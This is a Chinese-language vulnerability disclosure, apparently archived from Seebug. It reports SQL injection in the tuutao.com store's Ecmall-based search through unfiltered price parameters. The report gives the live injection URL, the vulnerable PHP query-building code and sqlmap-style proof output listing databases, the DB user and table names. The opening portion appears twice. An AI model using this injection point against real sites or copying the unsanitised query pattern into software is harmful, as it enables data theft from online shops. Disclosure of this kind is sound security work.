### 简要描述: SQL注射 ### 详细说明: http://www.tuutao.com/index.php 土淘网 用的Ecmall的建站模板,用过这个模板的应该都通杀了吧 [<img src="https://images.seebug.org/upload/201401/05154854944082e59c2c01112613d85009ccb2b2.jpg" alt="s1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/05154854944082e59c2c01112613d85009ccb2b2.jpg) 存在搜索框注入,注入点为: http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000 首先将获取get传来的参数,然后组合到一个sql查询语句condition中: 1.search.app.php中的这段代码就是构建查询min和max价格的sql代码,没有过滤: ``` /** * 取得查询条件语句 * * @param array $param 查询参数(参加函数_get_query_param的返回值说明) * @return string where语句 */ function _get_goods_conditions($param) { /* 组成查询条件 */ $conditions = " g.if_show = 1 AND g.closed = 0 AND s.state = 1"; // 上架且没有被禁售,店铺是开启状态, if (isset($param['keyword'])) { $conditions .= $this->_get_conditions_by_keyword($param['keyword'], ENABLE_SEARCH_CACHE); } if (isset($param['cate_id'])) { $conditions .= " AND g.cate_id_{$param['layer']} = '" ....
### 简要描述: SQL注射 ### 详细说明: http://www.tuutao.com/index.php 土淘网 用的Ecmall的建站模板,用过这个模板的应该都通杀了吧 [<img src="https://images.seebug.org/upload/201401/05154854944082e59c2c01112613d85009ccb2b2.jpg" alt="s1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/05154854944082e59c2c01112613d85009ccb2b2.jpg) 存在搜索框注入,注入点为: http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000 首先将获取get传来的参数,然后组合到一个sql查询语句condition中: 1.search.app.php中的这段代码就是构建查询min和max价格的sql代码,没有过滤: ``` /** * 取得查询条件语句 * * @param array $param 查询参数(参加函数_get_query_param的返回值说明) * @return string where语句 */ function _get_goods_conditions($param) { /* 组成查询条件 */ $conditions = " g.if_show = 1 AND g.closed = 0 AND s.state = 1"; // 上架且没有被禁售,店铺是开启状态, if (isset($param['keyword'])) { $conditions .= $this->_get_conditions_by_keyword($param['keyword'], ENABLE_SEARCH_CACHE); } if (isset($param['cate_id'])) { $conditions .= " AND g.cate_id_{$param['layer']} = '" . $param['cate_id'] . "'"; } if (isset($param['brand'])) { $conditions .= " AND g.brand = '" . $param['brand'] . "'"; } if (isset($param['region_id'])) { $conditions .= " AND s.region_id = '" . $param['region_id'] . "'"; } if (isset($param['price'])) { $min = $param['price']['min']; $max = $param['price']['max']; $min > 0 && $conditions .= " AND g.price >= '$min'"; $max > 0 && $conditions .= " AND g.price <= '$max'"; } return $conditions; } ``` 2.下面这部分代码是query执行部分,直接将上面的参数带入查询了: ``` /* 按价格统计 */ if ($total_count > NUM_PER_PAGE) { $sql = "SELECT MIN(g.price) AS min, MAX(g.price) AS max FROM {$table} WHERE" . $conditions; $row = $goods_mod->getRow($sql); $min = $row['min']; $max = min($row['max'], MAX_STAT_PRICE); $step = max(ceil(($max - $min) / PRICE_INTERVAL_NUM), MIN_STAT_STEP); $sql = "SELECT FLOOR((g.price - '$min') / '$step') AS i, count(*) AS count FROM {$table} WHERE " . $conditions . " GROUP BY i ORDER BY i"; $res = $goods_mod->db->query($sql); while ($row = $goods_mod->db->fetchRow($res)) { $data['by_price'][] = array( 'count' => $row['count'], 'min' => $min + $row['i'] * $step, 'max' => $min + ($row['i'] + 1) * $step, ); } } } ``` 3.这个页面上很多参数都没过滤,排查下吧 ### 漏洞证明: 数据库: ``` available databases [2]: [*] information_schema [*] tuutao ``` 账户: ``` current user: 'tuutao_u@localhost' ``` 数据库tuutao包含的表: ``` Database: tuutao [84 tables] +------------------------+ | _ecm_third_login | | chat_customgroup | | chat_pals | | chat_session | | chat_transfer_fileinfo | | chat_users | | ecm_acategory | | ecm_address | | ecm_ads_left | | ecm_article | | ecm_ative | | ecm_attribute | | ecm_brand | | ecm_cart | | ecm_category_goods | | ecm_category_store | | ecm_collect | | ecm_coupon | | ecm_coupon_sn | | ecm_friend | | ecm_function | | ecm_game | | ecm_gcategory | | ecm_get_prize | | ecm_goods | | ecm_goods_attr | | ecm_goods_image | | ecm_goods_integral | | ecm_goods_qa | | ecm_goods_spec | | ecm_goods_statistics | | ecm_goods_tpl | | ecm_goods_tuijian | | ecm_groupbuy | | ecm_groupbuy_log | | ecm_handsel | | ecm_hdlog | | ecm_integral | | ecm_logistics | | ecm_logistics_conf | | ecm_logsingle | | ecm_mail_queue | | ecm_member | | ecm_member_ofields | | ecm_message | | ecm_module | | ecm_money_logs | | ecm_navigation | | ecm_order | | ecm_order_extm | | ecm_order_goods | | ecm_order_integral | | ecm_order_log | | ecm_pageview | | ecm_partner | | ecm_payment | | ecm_privilege | | ecm_prize | | ecm_promotion | | ecm_promotion_local | | ecm_promotion_log | | ecm_recommend | | ecm_recommended_goods | | ecm_refer | | ecm_region | | ecm_scategory | | ecm_seckill | | ecm_seckill_subject | | ecm_sessions | | ecm_sessions_data | | ecm_sgrade | | ecm_ship | | ecm_shipping | | ecm_specialpage | | ecm_specialpage_goods | | ecm_specify | | ecm_store | | ecm_template | | ecm_third_login | | ecm_timedisc | | ecm_uploaded_file | | ecm_user_coupon | | ecm_user_priv | | ecm_user_prize | +------------------------+ ```
